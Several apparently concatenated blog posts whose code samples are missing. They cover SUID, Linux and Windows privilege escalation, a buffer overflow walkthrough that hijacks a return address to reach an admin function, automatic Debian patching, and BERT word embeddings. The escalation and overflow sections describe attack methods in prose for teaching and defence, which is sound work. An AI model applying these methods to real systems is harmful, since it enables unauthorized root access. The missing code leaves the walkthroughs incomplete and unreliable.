In the world of Linux security, SUID (Set User ID) is a powerful but potentially dangerous feature that controls
privilege escalation. This article will walk through how SUID works, illustrate its effects with a C program example,
and explore how improper handling of SUID binaries can lead to privilege escalation.
What is SUID?
SUID, or Set User ID, is a special permission flag in Unix-like operating systems that allows a user to execute a file
with the permissions of the file’s owner, rather than their own. This is particularly useful when certain tasks require
elevated privileges. For example, the passwd command uses SUID to allow any user to change their password, though the
actual file manipulations need root access.
SUID permission can be set using the chmod command with the octal value 4 in front of the file permissions. A SUID
binary might look something like this in a directory listing:
The s in the permission string indicates that the SUID bit is set.
Finding SUID Binaries
SUID binaries can be located with the find command. This is useful both for security auditing and for understanding
which executables can perform actions with elevated privileges.
This command searches the entire filesystem for files that have the SUID bit set. Be cautious with these binaries, as
any misconfiguration can expose the system to privilege escalation.
Building a Program to Understand SUID
Let’s construct a simple C program to see the effects of SUID in action and learn how real and effective user IDs (UIDs)
behave.
Here’s our initial program, which will print both the Real UID (RUID) and the Effective UID (EUID). These IDs help
determine the permissions available during program execution:
To compile the program, use:
On the first run of this program, it’ll pick up the same id (the current executing user) for both the real and
effective UID:
We can escalate these privileges here through the use of sudo:
Using sudo is cheating though. We want to demonstrate SUID.
Adding SUID
We’ll set the program’s SUID bit so it can be run with elevated privileges:
If we re-run this program now, our real and effective UIDs are different:
Now, our Effective UID (EUID) is 0, meaning we have root privileges, while the Real UID (RUID) remains our original
user ID.
Adding setuid
Calling setuid(0) explicitly sets the Real UID and Effective UID to 0, making the user a superuser. This step is
often necessary to maintain root access throughout the program execution.
Now that we have setuid in place, executing this program as our standard (1000) user gives us this result:
With this call, both the Real and Effective UID will be set to 0, ensuring root-level privileges throughout
the execution.
Security Implications of SUID
SUID binaries, when not managed carefully, can introduce security vulnerabilities. Attackers can exploit misconfigured
SUID programs to gain unauthorized root access. A few best practices include:
Minimizing SUID Binaries: Only use SUID where absolutely necessary, and regularly audit the system for SUID binaries.
Code Review: Ensure that all SUID programs are thoroughly reviewed for security vulnerabilities, particularly around system calls like system(), which could potentially be hijacked.
Conclusion
In this post, we explored how SUID works, implemented a program to observe its effects on Real and Effective UIDs, and
demonstrated the power of privilege escalation. While SUID is a useful tool for certain applications, it must be
carefully managed to avoid security risks. By understanding SUID, Linux administrators and developers can better protect
their systems against privilege escalation attacks.
Privilege escalation is a critical concept in cybersecurity, allowing an attacker to gain higher-level access to systems
by exploiting specific weaknesses. This process often enables adversaries to move from limited user roles to more
powerful administrative or root-level access. In this article, we’ll dive into several common privilege escalation
techniques on both Linux and Windows systems, covering methods such as exploiting SUID binaries, weak permissions,
and kernel vulnerabilities.
Privilege Escalation
Privilege escalation attacks typically fall into two categories:
Vertical Privilege Escalation: This occurs when a user with lower privileges (e.g., a standard user) gains access to higher privileges (e.g., an admin or root level).
Horizontal Privilege Escalation: In this case, an attacker remains at the same privilege level but accesses resources or areas they typically shouldn’t have access to.
This article focuses on vertical privilege escalation techniques on Linux and Windows systems.
Linux
Exploiting SUID Binaries
In Linux, binaries with the SUID (Set User ID) bit set run with the privileges of the file owner rather than the
user executing them. A misconfigured SUID binary owned by root can be exploited to execute code with root privileges.
To locate SUID binaries, use:
Once located, inspect the binary for potential exploitation. Some known binaries like find, vim, or perl can often
be exploited with SUID if configured incorrectly. For instance:
Weak File Permissions
Misconfigured permissions can lead to privilege escalation when files essential to the system or owned by
higher-privilege users are writable by lower-privilege accounts.
As an example, if an attacker can write to /etc/passwd, they can add a new user with root privileges:
Alternatively, a writable /etc/shadow file can enable password manipulation for privileged users.
Kernel Exploits
Linux kernel vulnerabilities are a frequent target for privilege escalation, especially in environments where patching
is delayed. It is critical to remain patched and up to day, as well as to keep looking at
exploit registers to stay ahead.
Cron Jobs and PATH Exploits
If cron jobs are running scripts with elevated privileges and the script location or PATH variable is misconfigured,
attackers may be able to manipulate the outcome.
For instance, if a cron job executes a script owned by root from /tmp, an attacker can replace or edit this script to
run commands with root privileges.
Exploiting Misconfigured Capabilities
Linux capabilities allow fine-grained control of specific root privileges for binaries. For instance, a binary with
CAP_SETUID capability can change user IDs without full root access. Misconfigured capabilities can be listed with:
Windows
Misconfigured Service Permissions
In Windows, services running as SYSTEM or Administrator can be exploited if lower-privilege users have permission to modify them.
To enumerate services with exploitable permissions, use PowerShell:
Tools like AccessChk can also help determine whether services are misconfigured:
If a service is found to be modifiable, an attacker could replace the executable path with a malicious file to run as SYSTEM.
DLL Hijacking
Windows programs often load DLLs from specific directories in a defined order. If a high-privilege process loads a DLL
from a directory where an attacker has write access, they can place a malicious DLL in that directory to achieve code
execution at a higher privilege level.
To locate DLL loading paths, analyze process dependencies with tools like Process Monitor.
Weak Folder Permissions
Folder permissions can escalate privileges if users can write to directories containing executables or scripts used by
high-privilege processes.
An attacker could replace a legitimate executable in a writable directory to execute malicious code. Check for writable
directories in the PATH:
Token Impersonation
In Windows, processes running as SYSTEM can often create impersonation tokens, allowing privileged processes to
temporarily “impersonate” another user. Attackers can exploit tokens left by privileged processes to escalate privileges
using tools like Incognito or PowerShell.
For instance, PowerShell can be used to list tokens available:
Kernel Vulnerabilities
In the same way as Linux, Windows will also have kernel exploits that come up on the register. Make sure you’re always
patched and on top of the latest issues.
Conclusion
Privilege escalation is a critical step in many cyberattacks, allowing attackers to move from restricted to privileged
roles on a system. For both Linux and Windows, attackers leverage vulnerabilities in service configurations,
permissions, and system processes to achieve this goal. Security professionals must stay informed about these techniques
and patch, configure, and monitor systems to defend against them.
Regularly auditing permissions, keeping software up-to-date, and minimizing the attack surface are essential to
mitigating privilege escalation risks. By understanding and addressing these common methods, organizations can
significantly reduce the potential for unauthorized privilege escalation.
Buffer overrun exploits (also known as buffer overflow attacks) are one of the most well-known and dangerous types of
vulnerabilities in software security. These exploits take advantage of how a program manages memory—specifically, by
writing more data to a buffer (an allocated block of memory) than it can safely hold. When this happens, the excess data
can overwrite adjacent memory locations, potentially altering the program’s control flow or causing it to behave
unpredictably.
Attackers can exploit buffer overruns to inject malicious code or manipulate the system to execute arbitrary
instructions, often gaining unauthorized access to the target system. Despite being a well-studied vulnerability, buffer
overflows remain relevant today, particularly in low-level languages like C and C++, which allow direct memory
manipulation.
In this post, we’ll take a closer look at buffer overrun exploits, how they work, and explore some real-world code
examples in C that demonstrate this vulnerability. By understanding the mechanics behind buffer overflows, we can also
better understand how to mitigate them.
Disclaimer: The code in this article is purely for demonstration purposes. We use some intentionally unsafe
techniques to set up an exploitable scenario. DO NOT use this code in production applications, ever.
Password Validator Example
In the following example, the program will ask for input from the user and validate it against a password stored on the
server.
do_super_admin_things is our example. It might be an admin shell, or something else. The point is this program is
trying to control access to that function by making sure you have the password, first!
The validate_password function is responsible for getting that password in from the outside world. It’s prompts, and
then reads from stdin. Note the use of gets().
Warning About gets
The usage of gets() here is highly frowned upon because of how insecure it is. Below are notes from the man page for
it:
BUGS
Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.
The Library Functions Manual makes it clear. It’s such a horrible function security-wise that it has been deprecated from
the C99 standard as per §7.26.13:
The gets function is obsolescent, and is deprecated.
If there’s one thing to learn from this section, it’s don’t use gets().
To get this code to compile, I had to relax some of the standard rules and mute certain warnings:
Checking the Password
The check_password function reads a file from disk that contains the super-secret password, then compares the attempt
to the correct password.
Crashes
Initially, if you provide any normal input, the program behaves as expected:
But if you push the input a bit further, exceeding the bounds of the password_attempt buffer, you can trigger a crash:
The program crashes due to a segmentation fault. Checking dmesg gives us more information:
Notice the 41414141 pattern. This is significant because it shows that the capital A’s from our input (0x41 in
hexadecimal) are making their way into the instruction pointer (ip). The input we provided has overflowed into crucial
parts of the stack, including the instruction pointer.
You can verify that 0x41 represents ‘A’ by running the following command:
Controlling the Instruction Pointer
This works because the large input string is overflowing the password_attempt buffer. This buffer is a local variable
in the validate_password function, and in the stack, local variables are stored just below the return address. When
password_attempt overflows, the excess data overwrites the return address on the stack. Once overwritten, we control
what address the CPU will jump to after validate_password finishes.
Maybe, we could find the address of the do_super_admin_things function and simply jump directly to it. In order to do
this, we need to find the address. Only the name of the function is available to us in the source code, and the address
of the function is determined at compile time; so we need to lean on some other tools in order to gather this intel.
By using objdump we can take a look inside of the compiled executable and get this information.
This will decompile the vuln1 program and give us the location of each of the functions. We search for the function
that we want (do_super_admin_things):
We find that it’s at address 00001316. We need to take note of this value as we’ll need it shortly.
Now we need to find the spot among that big group of A’s that we’re sending into the input, exactly where the right spot
is, where we can inject our address onto the stack. We’ve already got some inside knowledge about our buffer. It’s 64
bytes in length.
We really need a magic mark in the input so we can determine where to send our address in. We can do that with some well
known payload data. We re-run the program with our 64 A’s but we also add a pattern of characters afterwards:
This seg faults again, but you can see the BBBBCCCCDDDDEEEEFFFF at the end of the 64 A’s. Looking at the log in
dmesg now:
The 45454545 tells us which part of the input is being sent in as the return address. \x45 is the E’s
That means that our instruction pointer will start at the E’s.
Prepare the Payload
To make life easier for us, we’ll write a python script that will generate this payload for us. Note that this is using
our function address from before.
We can now inject this into the execution of our binary and achieve a shell:
We use (python3 payload.py; cat) here because of the shell’s handling of file descriptors. Without doing this and
simply piping the output, our shell would kill the file descriptors off.
Static vs. Runtime Addresses
When we run our program normally, modern operating systems apply Address Space Layout Randomization (ASLR), which
shifts memory locations randomly each time the program starts. ASLR is a security feature that makes it more challenging
for exploits to rely on hardcoded memory addresses, because the memory layout changes every time the program is loaded.
For example, if we inspect the runtime address of 1do_super_admin_things` in GDB, we might see something like:
This differs from the objdump address 0x1326, as it’s been shifted by the base address of the executable
(e.g., 0x56555000 in this case). This discrepancy is due to ASLR.
Temporarily Disabling ASLR for Demonstration
To ensure the addresses in objdump match those at runtime, we can temporarily disable ASLR. This makes the program
load at consistent addresses, which is useful for demonstration and testing purposes.
To disable ASLR on Linux, run:
This command disables ASLR system-wide. Be sure to re-enable ASLR after testing by setting the value back to 2:
Conclusion
In this post, we explored the mechanics of buffer overflow exploits, walked through a real-world example in C, and
demonstrated how ASLR impacts the addresses used in an exploit. By leveraging objdump, we could inspect static
addresses, but we also noted how runtime address randomization, through ASLR, makes these addresses unpredictable.
Disabling ASLR temporarily allowed us to match objdump addresses to those at runtime, making the exploit demonstration
clearer. However, this feature highlights why modern systems adopt ASLR: by shifting memory locations each time a
program runs, ASLR makes it significantly more difficult for attackers to execute hardcoded exploits reliably.
Understanding and practicing secure coding, such as avoiding vulnerable functions like gets() and implementing stack
protections, is crucial in preventing such exploits. Combined with ASLR and other modern defenses, these practices
create a layered approach to security, significantly enhancing the resilience of software.
Buffer overflows remain a classic but essential area of study in software security. By thoroughly understanding their
mechanisms and challenges, developers and security researchers can better protect systems from these types of attacks.
Keeping your Linux servers up to date with the latest security patches is critical. Fortunately, if you’re running a
Debian-based distribution (like Debian or Ubuntu), you can easily automate this process using unattended-upgrades. In
this guide, we’ll walk through setting up automatic patching with unattended-upgrades, configuring a schedule for
automatic reboots after updates, and setting up msmtp to send email notifications from your local Unix mail account.
Installation
The first step is to install unattended-upgrades, which will automatically install security (and optionally other)
updates on your server. Here’s how to do it:
After installation, you’ll want to enable unattended-upgrades:
This will configure your server to automatically install security updates. However, you can customize the configuration
to also include regular updates if you prefer.
Configuration
By default, unattended-upgrades runs daily, but you can configure it further by adjusting the automatic reboot
settings to ensure that your server reboots after installing updates when necessary.
Automatic Updates
Edit the unattended-upgrades configuration file:
Make sure the file has the following settings to apply both security and regular updates:
Automatic Reboots
You can also configure the server to automatically reboot after installing updates (useful when kernel updates require a
reboot). To do this, add or modify the following lines in the same file:
Testing and Dry Runs
To give this a quick test, you can use the following:
Email Notification
In the same file, you can simply add the email address that you’d like to notify:
You may need to configure your Debian machine to be able to send email. For this, we’ll use msmtp, which can relay
emails. I use gmail, but you can use any provider.
Configuration
Open up the /etc/msmtprc file. For the password here, I needed to use an “App Password” from Google (specifically).
Default
You can set msmtp as your default by linking it as sendmail.
Testing
Make sure your setup for email is working now by sending yourself a test message:
Conclusion
With unattended-upgrades and msmtp configured, your Debian-based servers will automatically stay up to date with
security and software patches, and you’ll receive email notifications whenever updates are applied. Automating patch
management is crucial for maintaining the security and stability of your servers, and these simple tools make it easy to
manage updates with minimal effort.
In our previousposts,
we explored traditional text representation techniques like One-Hot Encoding, Bag-of-Words, and TF-IDF, and
we introduced static word embeddings like Word2Vec and GloVe. While these techniques are powerful, they have
limitations, especially when it comes to capturing the context of words.
In this post, we’ll explore more advanced topics that push the boundaries of NLP:
Contextual Word Embeddings like ELMo, BERT, and GPT
Dimensionality Reduction techniques for visualizing embeddings
Applications of Word Embeddings in real-world tasks
Training Custom Word Embeddings on your own data
Let’s dive in!
Contextual Word Embeddings
Traditional embeddings like Word2Vec and GloVe generate a single fixed vector for each word. This means the word “bank”
will have the same vector whether it refers to a “river bank” or a “financial institution,” which is a major limitation
in understanding nuanced meanings in context.
Contextual embeddings, on the other hand, generate different vectors for the same word depending on its context.
These models are based on deep learning architectures and have revolutionized NLP by capturing the dynamic nature of
language.
ELMo (Embeddings from Language Models)
ELMo was one of the first models to introduce the idea of context-dependent word representations. Instead of a fixed
vector, ELMo generates a vector for each word that depends on the entire sentence. It uses bidirectional LSTMs
to achieve this, looking both forward and backward in the text to understand the context.
BERT (Bidirectional Encoder Representations from Transformers)
BERT takes contextual embeddings to the next level using the Transformer architecture. Unlike traditional models,
which process text in one direction (left-to-right or right-to-left), BERT is bidirectional, meaning it looks at all
the words before and after a given word to understand its meaning. BERT also uses pretraining and fine-tuning,
making it one of the most versatile models in NLP.
GPT (Generative Pretrained Transformer)
While GPT is similar to BERT in using the Transformer architecture, it is primarily unidirectional and excels at
generating text. This model has been the backbone for many state-of-the-art systems in tasks like
text generation, summarization, and dialogue systems.
Why Contextual Embeddings Matter
Contextual embeddings are critical in modern NLP applications, such as:
Named Entity Recognition (NER): Contextual models help disambiguate words with multiple meanings.
Machine Translation: These embeddings capture the nuances of language, making translations more accurate.
Question-Answering: Systems like GPT-3 excel in understanding and responding to complex queries by leveraging context.
To experiment with BERT, you can try the transformers library from Hugging Face:
The tensor output from this process should look something like this:
2. Visualizing Word Embeddings
Word embeddings are usually represented as high-dimensional vectors (e.g., 300 dimensions for Word2Vec). While this is
great for models, it’s difficult for humans to interpret these vectors directly. This is where dimensionality reduction
techniques like PCA and t-SNE come in handy.
Principal Component Analysis (PCA)
PCA reduces the dimensions of the word vectors while preserving the most important information. It helps us visualize
clusters of similar words in a lower-dimensional space (e.g., 2D or 3D).
Following on from the previous example, we’ll use the simple embeddings that we’ve generated in the output variable.
You should see a plot similar to this:
This is a scatter plot where the 768 dimensions of each embedding has been reduced two to 2 principal components using
Principal Component Analysis (PCA). This allows us to plot these in two-dimensional space.
Some observations when looking at this chart:
Special Tokens [CLS] and [SEP]
These special tokens are essential in BERT. The [CLS] token is typically used as a summary representation for the
entire sentence (especially in classification tasks), and the [SEP] token is used to separate sentences or indicate
the end of a sentence.
In the plot, you can see [CLS] and [SEP] are far apart from other tokens, especially [SEP], which has a distinct
position in the vector space. This makes sense since their roles are unique compared to actual word tokens like “amazing”
or “is.”
Subword Tokens
Notice the token labeled ##p. This represents a subword. BERT uses a WordPiece tokenization algorithm, which
breaks rare or complex words into subword units. In this case, “NLP” has been split into nl and ##p because BERT
doesn’t have “NLP” as a whole word in its vocabulary. The fact that nl and ##p are close together in the plot
indicates that BERT keeps semantically related parts of the same word close in the vector space.
Contextual Similarity
The tokens “amazing” and “is” are relatively close to each other, which reflects that they are part of the same sentence
and share a contextual relationship. Interestingly, “amazing” is a bit more isolated, which could be because it’s a more
distinctive word with a strong meaning, whereas “is” is a more common auxiliary verb and closer to other less distinctive
tokens.
Distribution and Separation
The distance between tokens shows how BERT separates different tokens in the vector space based on their contextual
meaning. For example, [SEP] is far from the other tokens because it serves a very different role in the sentence.
The overall spread of the tokens suggests that BERT embeddings can clearly distinguish between different word types
(subwords, regular words, and special tokens).
t-SNE is another popular technique for visualizing high-dimensional data. It captures both local and global
structures of the embeddings and is often used to visualize word clusters based on their semantic similarity.
I’ve continued on from the code that we’ve been using:
The output of which looks a little different to PCA:
There is a different distribution of the embeddings in comparison.
Real-World Applications of Word Embeddings
Word embeddings are foundational in numerous NLP applications:
Semantic Search: Embeddings allow search engines to find documents based on meaning rather than exact keyword matches.
Sentiment Analysis: Embeddings can capture the sentiment of text, enabling models to predict whether a review is positive or negative.
Machine Translation: By representing words from different languages in the same space, embeddings improve the accuracy of machine translation systems.
Question-Answering Systems: Modern systems like GPT-3 use embeddings to understand and respond to natural language queries.
Example: Semantic Search with Word Embeddings
In a semantic search engine, user queries and documents are both represented as vectors in the same embedding space. By
calculating the cosine similarity between these vectors, we can retrieve documents that are semantically related to the
query.
Walking through this code:
query_embedding and document_embeddings
We generate random vectors to simulate the embeddings. In a real use case, these would come from an embedding model
(e.g., BERT, Word2Vec). The query_embedding represents the vector for the user’s query, and document_embeddings
represents vectors for a set of documents.
Both query_embedding and document_embeddings must have the same dimensionality (e.g., 768 if you’re using BERT).
Cosine Similarity
The cosine_similarity() function computes the cosine similarity between the query_embedding and each document embedding.
Cosine similarity measures the cosine of the angle between two vectors, which ranges from -1 (completely dissimilar) to 1 (completely similar). In this case, we’re interested in documents that are most similar to the query (values close to 1).
Ranking the Documents
We use argsort() to get the indices of the document embeddings sorted in ascending order of similarity.
The [::-1] reverses this order so that the most similar documents appear first.
The ranked_indices gives the document indices, ranked from most similar to least similar to the query.
The output of which looks like this:
Training Your Own Word Embeddings
While pretrained embeddings like Word2Vec and BERT are incredibly powerful, sometimes you need embeddings that are
fine-tuned to your specific domain or dataset. You can train your own embeddings using frameworks like Gensim for
Word2Vec or PyTorch for more complex models.
The following code shows training Word2Vec with Gensim:
The output here is a 100-dimensional vector that represents the word NLP.
Fine-Tuning BERT with PyTorch
You can also fine-tune BERT or other transformer models on your own dataset. This is useful when you need embeddings
that are tailored to a specific domain, such as medical or legal text.
Conclusion
Word embeddings have come a long way, from static models like Word2Vec and GloVe to dynamic, context-aware
models like BERT and GPT. These techniques have revolutionized how we represent and process language in NLP.
Alongside dimensionality reduction for visualization, applications such as semantic search, sentiment analysis, and
custom embeddings training open up a world of possibilities.